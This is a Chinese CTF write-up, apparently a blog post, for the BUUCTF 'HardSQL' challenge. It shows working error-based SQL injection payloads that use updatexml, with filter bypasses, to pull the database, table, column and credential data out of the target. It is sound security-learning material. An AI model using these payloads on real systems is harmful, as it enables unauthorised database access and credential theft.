当前位置: 首页 > news >正文

BUUCTF-web刷题篇(14)

news 2025/8/13 19:21:25

23.HardSQL

万能密码和双写绕过都不起作用,尝试报错注入(datexml和extractvalue两种)

用updatexml试试:

1'or (updatexml(1,concat(0x7e,database(),0x7e),1))or'

发现错误,应该有过滤,经过测试,至少and,空格,等于 等被过滤

那就用^代替and,用()代替空格,like代替=

1'^(updatexml(1,concat(0x7e,database(),0x7e),1))or'

成功爆库,开始爆表

1'^(updatexml(1,(concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek')),0x7e)),1))or'

爆字段

1'^(updatexml(1,(concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema)like('geek')),0x7e)),1))or'

爆数据

1'^(updatexml(1,(concat(0x7e,(select(group_concat(id,username,password))from(geek.H4rDsq1)),0x7e)),1))or'

发现只有一半,因为只能输出32字符,我们可以用right函数来获取后面的字符,right(password,32)(可以换成30,因为后面还有个}和~,32只是因为没有影响就没改)

1'^(updatexml(1,(concat(0x7e,(select(group_concat(right(password,32)))from(geek.H4rDsq1)),0x7e)),1))or'

拼凑即可获得flag

http://www.dtcms.com/a/120178.html

相关文章:

  • 边缘计算革命:低功耗GPU在自动驾驶实时决策中的应用
  • [ctfshow web入门] web25
  • 通过扣子平台将数据写入飞书多维表格
  • rockylinux 8 9 升级到指定版本
  • excel的逻辑类型函数(主要包括if、and、or、not、xor、iserror、iferror、true、false、ifs、ifna、switch)
  • 迁移WordPress网站(大文件版本)
  • 任务扩展-输入商品原价,折扣并计算促销后的价格
  • 二十八- Scala
  • 使用LangChain Agents构建Gradio及Gradio Tools(6)——创建自己的GradioTool
  • 关于软件bug描述
  • 核心案例 | 湖南汽车工程职业大学无人机操控与编队技术实验室
  • 引入模型的知识点整理(Three.js)
  • 阅读笔记“BFMSense”
  • MVS 无监督学习
  • docker各种清空缓存命令,下载jdk包总失败,执行完好了
  • BUUCTF-web刷题篇(15)
  • SeaTunnel系列之:部署SeaTunnel的Spark和Flink引擎
  • 时序数据库 TDengine Cloud 私有连接实战指南:4步实现数据安全传输与成本优化
  • (二)链表结构
  • Redis-一般操作
  • 深入理解CSS对齐属性:align-items, align-self, justify-items, justify-self
  • EasyExcel结合多线程+控制sheet页全量导出
  • 【每日随笔】目标制定的 “ 降维哲学 “ ( 目标过高引发 “ 行动力损耗 “ | 目标过低引发 “ 结果递减 “ | 目标制定最佳策略 )
  • 【Java设计模式】第2章 UML急速入门
  • #MongoDB 快速上手
  • swift-08-属性、汇编分析inout本质
  • StarRocks 助力首汽约车精细化运营
  • react实现上传图片到阿里云OSS以及问题解决(保姆级)
  • Spring中使用Kafka的详细配置,以及如何集成 KRaft 模式的 Kafka
  • 数据结构和算法(十二)--最小生成树